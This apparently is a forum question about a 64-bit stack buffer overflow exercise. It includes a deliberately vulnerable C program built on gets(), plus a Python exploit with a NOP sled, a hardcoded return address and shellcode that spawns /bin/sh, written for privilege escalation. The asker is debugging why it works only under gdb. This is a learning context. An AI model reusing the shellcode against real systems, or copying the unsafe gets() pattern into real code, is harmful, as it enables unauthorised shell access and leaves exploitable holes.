I'm facing a problem while trying to inject shellcode into a program through a buffer overflow on a 64bit. I already disabled ASLR and compiled without stack cookies and with execstack.
// vuln.c
#include <stdio.h>
void vuln()
{
printf("Give me something to worry about...\n");
char buf[500];
gets(buf);
printf("No root shell for you...\n");
}
int main()
{
vuln();
}
# exp.py
from struct import pack
payload_len = 520
nop = "\x90"*300
# Address in the middle of the nop stack
rip = 0x7fffffffdf4c
buf = ""
buf += "\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05"
buf += "\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05"
buf += "\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"
buf_len = len(buf)
nop_len = len(nop)
padding = "A"*(payload_len-nop_len-buf_len)
payload = nop + buf + padding + pack("<Q", rip)
print payload
Basically the exploit only works while running in gdb (I'm able to start a shell) but not on the command line. I figured it could be because a closed pipe so I tried the cat trick by doing (python exp.py; cat) | ./vuln but it didn't help. Obviously doing the exploit in gdb doesn't allow to escalate privileges. Does someone know what I'm doing wrong?
Thanks in advance.
